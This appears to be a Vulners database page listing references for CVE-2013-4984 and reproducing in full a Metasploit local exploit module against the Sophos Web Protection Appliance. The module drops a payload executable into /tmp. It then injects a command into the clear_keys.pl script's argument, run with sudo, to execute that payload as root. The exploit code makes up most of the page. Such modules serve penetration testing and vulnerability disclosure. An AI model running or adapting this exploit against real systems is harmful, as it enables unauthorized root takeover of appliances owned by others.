| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| Sophos Web Protection Appliance Command Injection Vulnerability | 7 Sep 201300:00 | – | zdt | |
| Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation | 17 Sep 201300:00 | – | zdt | |
| CVE-2013-4984 | 9 Sep 201300:00 | – | circl | |
| Sophos Web Protection Appliance Multiple Vulnerabilities | 6 Sep 201300:00 | – | coresecurity | |
| CVE-2013-4984 | 10 Sep 201310:00 | – | cve | |
| CVE-2013-4984 | 10 Sep 201310:00 | – | cvelist | |
| Sophos Web Protection Appliance 3.8.1 RCE | 10 Sep 201300:00 | – | dsquare | |
| Sophos Web Protection Appliance - Multiple Vulnerabilities | 9 Sep 201300:00 | – | exploitdb | |
| Sophos Web Protection Appliance - clear_keys.pl Privilege Escalation (Metasploit) | 17 Sep 201300:00 | – | exploitdb | |
| EUVD-2013-4828 | 7 Oct 202500:30 | – | euvd |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
def initialize(info={})
super( update_info( info, {
'Name' => 'Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation',
'Description' => %q{
This module abuses a command injection on the clear_keys.pl perl script, installed with the
Sophos Web Protection Appliance, to escalate privileges from the "spiderman" user to "root".
This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection
Appliance web ui, executed by the "spiderman" user. This module has been tested successfully
on Sophos Virtual Web Appliance 3.7.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Francisco Falcon', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>[[ 'Linux x86', { 'Arch' => ARCH_X86 } ]],
'References' =>
[
[ 'CVE', '2013-4984' ],
[ 'OSVDB', '97028' ],
[ 'BID', '62265' ],
[ 'URL', 'http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities']
],
'DefaultOptions' =>
{
"PrependFork" => true,
"PrependSetresuid" => true,
"PrependSetresgid" => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2013-09-06'
}
))
register_options [
OptString.new("clear_keys", [ true, "Path to the clear_keys.pl vulnerable script", "/opt/cma/bin/clear_keys.pl" ])
]
register_advanced_options [
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ])
]
end
def check
if file?(datastore["clear_keys"])
return CheckCode::Detected
end
return CheckCode::Safe
end
def exploit
print_status("Checking actual user...")
id = cmd_exec("id -un")
if id != "spiderman"
fail_with(Failure::NoAccess, "The actual user is \"#{id}\", you must be \"spiderman\" to exploit this")
end
print_status("Checking for the vulnerable component...")
if check != CheckCode::Detected
fail_with(Failure::NoTarget, "The vulnerable component has not been found")
end
print_status("Dropping the payload to #{datastore["WritableDir"]}")
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
write_file(exe_file, generate_payload_exe)
cmd_exec "chmod +x #{exe_file}"
print_status("Running...")
begin
# rm the file after executing it to avoid getting multiple sessions
cmd_exec "sudo #{datastore["clear_keys"]} #{rand_text_alpha(4 + rand(4))} \";#{exe_file}; rm -f #{exe_file};\" /#{rand_text_alpha(4 + rand(4))}"
ensure
cmd_exec "rm -f #{exe_file}"
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation